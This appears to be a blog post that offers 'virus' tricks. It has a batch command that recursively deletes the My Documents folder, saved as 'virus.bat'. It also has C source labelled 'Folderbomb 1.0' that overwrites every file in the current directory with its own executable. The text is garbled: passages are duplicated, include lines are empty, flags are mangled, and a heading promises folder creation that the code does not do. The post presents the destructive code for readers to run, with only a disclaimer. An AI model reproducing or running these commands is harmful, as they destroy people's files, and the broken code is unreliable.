To delete the My documents folder:
first open a notepad and paste : rmdir C:\Documents and Settings \S\Q
then save the file with any name with .Bat extention eg: virus.bat
now if u open this file your my document folder will be deleted.
to create lots of folder inside a folder:
copy this code:
note: run this on your own responsibility if any other damages occurs then we are not responsible for it.
first open a notepad and paste : rmdir C:\Documents and Settings \S\Q
then save the file with any name with .Bat extention eg: virus.bat
now if u open this file your my document folder will be deleted.
to create lots of folder inside a folder:
copy this code:
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); } getch(); } and save the file and run it. |
note: run this on your own responsibility if any other damages occurs then we are not responsible for it.
0 comments:
Post a Comment